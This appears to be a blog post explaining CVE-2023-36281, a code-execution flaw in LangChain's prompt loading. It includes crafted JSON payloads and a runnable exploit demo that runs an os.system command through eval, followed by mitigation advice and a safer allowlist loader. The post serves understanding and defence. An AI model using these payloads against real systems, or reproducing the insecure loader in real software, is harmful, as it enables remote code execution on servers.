LangChain is a popular open-source framework for developing applications powered by large language models (LLMs). In June 2023, a critical vulnerability, CVE-2023-36281, was discovered in version 0.0.171 that allows remote attackers to execute arbitrary code simply by getting an application to load a crafted JSON file with the load_prompt method.
This post breaks down this vulnerability in simple terms, provides example code, and explains how attackers can exploit it.
What is the Vulnerability?
LangChain's load_prompt function is designed to help developers import prompt templates from files (including JSON). In affected versions, the loading path relies on unsafe techniques such as Python's __subclasses__ and eval to reconstruct objects based solely on the data in the JSON file.
If an attacker can supply a JSON file with specially crafted content, LangChain may trust that JSON and execute arbitrary code on your server. This is a classic deserialization flaw, a common bug class in which "loading" data turns into "running code" when the loader is careless.
Let’s look at a simplified version of what might happen inside load_prompt:
import json

def load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    # DANGER: dynamically selecting a class by name and instantiating it
    clazz = [cls for cls in object.__subclasses__() if cls.__name__ == config["class"]][0]
    return clazz(**config["kwargs"])
The object.__subclasses__() call retrieves every direct subclass of Python's base object class, including dangerous ones like os._wrap_close and warnings.catch_warnings that can be abused as stepping stones to code execution. An attacker can choose class and kwargs in the JSON so that the application ends up executing attacker-supplied code.
NOTE: This is a simplified example, but it captures the core issue.
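To make the danger concrete, here is a small standalone sketch (illustrative code, not LangChain's) that builds the same name-to-class lookup the loader above performs. On a typical CPython interpreter it shows that gadget classes such as warnings.catch_warnings and os._wrap_close are reachable purely by name:

import os        # defining os._wrap_close registers it as a direct subclass of object
import warnings  # same for warnings.catch_warnings

# Illustrative only: build the name -> class lookup the vulnerable loader performs.
gadgets = {cls.__name__: cls for cls in object.__subclasses__()}

print(len(gadgets), "direct subclasses of object are reachable by name")
print("catch_warnings" in gadgets)  # True
print("_wrap_close" in gadgets)     # True

Whichever of these classes the JSON names, the vulnerable loader will happily instantiate it with attacker-controlled keyword arguments.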
The attacker crafts a JSON file like this:
{
  "class": "warning",
  "kwargs": {
    "message": "__import__('os').system('touch /tmp/pwned')",
    "category": "UserWarning"
  }
}
If the application uses eval or similar techniques to "reconstruct" objects from this JSON, the malicious payload __import__('os').system('touch /tmp/pwned') will execute on the server when this file is loaded.
Here’s an end-to-end Python demo showing how the vulnerability can be abused:
import json

# Malicious JSON payload
malicious_json = '''
{
  "class": "catch_warnings",
  "kwargs": {
    "record": false,
    "module": "__import__('os').system('touch /tmp/hacked')"
  }
}
'''

with open("malicious_prompt.json", "w") as f:
    f.write(malicious_json)

# Simplified stand-in for the loading logic in older LangChain versions
def vulnerable_load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    cls = [c for c in object.__subclasses__() if c.__name__ == config["class"]][0]
    # Insecure: string kwargs are "reconstructed" with eval before instantiation
    kwargs = {k: eval(v) if isinstance(v, str) else v for k, v in config["kwargs"].items()}
    return cls(**kwargs)

# Loading the file executes the attacker's system command
vulnerable_load_prompt("malicious_prompt.json")
Running this code will create a file /tmp/hacked on the system, proving the attack worked and arbitrary code was run.
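If you try the demo in a throwaway environment, a quick check (assuming you kept the /tmp/hacked marker from the payload above) confirms the side effect:

import os

# True if the payload's system command ran when the JSON was loaded
print(os.path.exists("/tmp/hacked"))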
References
- GitHub Advisory: GHSA-2jgw-mphw-4rg9
- MITRE CVE Database: CVE-2023-36281
- LangChain changelog with fix (v0.0.172)
Who’s At Risk?
- Anyone running LangChain ≤ 0.0.171 and letting users upload, supply, or modify prompt configs (JSON or YAML).
How to Protect Yourself
1. Upgrade Immediately: Update to LangChain v0.0.172 or later. Upgrading patches this bug.
2. Never Trust User Templates: Even in newer versions, don’t load arbitrary templates from unknown users.
3. Audit Custom Loading Code: If you have custom prompt-loading logic, make sure you don’t use __subclasses__, eval, or similar dynamic features on user data (see the sketch after this list).
4. Deploy AppArmor, Seccomp, etc.: Add defense-in-depth by restricting what your Python process can do.
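For point 3, here is a minimal sketch of a safer custom loader, assuming your application only ever needs a small, known set of prompt classes. The allowlist contents are an illustrative assumption, not LangChain's actual loading code; the point is that it avoids __subclasses__ entirely and never evaluates strings from the file:

import json

from langchain.prompts import PromptTemplate

# Hypothetical allowlist: map the config's "class" field to constructors you trust.
ALLOWED_CLASSES = {
    "prompt": PromptTemplate,
}

def safe_load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    cls = ALLOWED_CLASSES.get(config.get("class"))
    if cls is None:
        raise ValueError(f"Refusing to load unknown class: {config.get('class')!r}")
    # Kwargs are passed through as plain data; nothing from the file is ever eval()'d.
    return cls(**config["kwargs"])

Even with an allowlist, templates supplied by untrusted users should still be treated as untrusted input and validated before use.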
Final Words
CVE-2023-36281 is a textbook example of why you should never blindly load or reconstruct Python objects from user data — especially when using features like __subclasses__ and eval.
If you use LangChain in production, immediately upgrade and audit your templates. For further reading, check the original GitHub advisory.
Timeline
Published on: 08/22/2023 19:16:36 UTC
Last modified on: 11/17/2023 19:15:08 UTC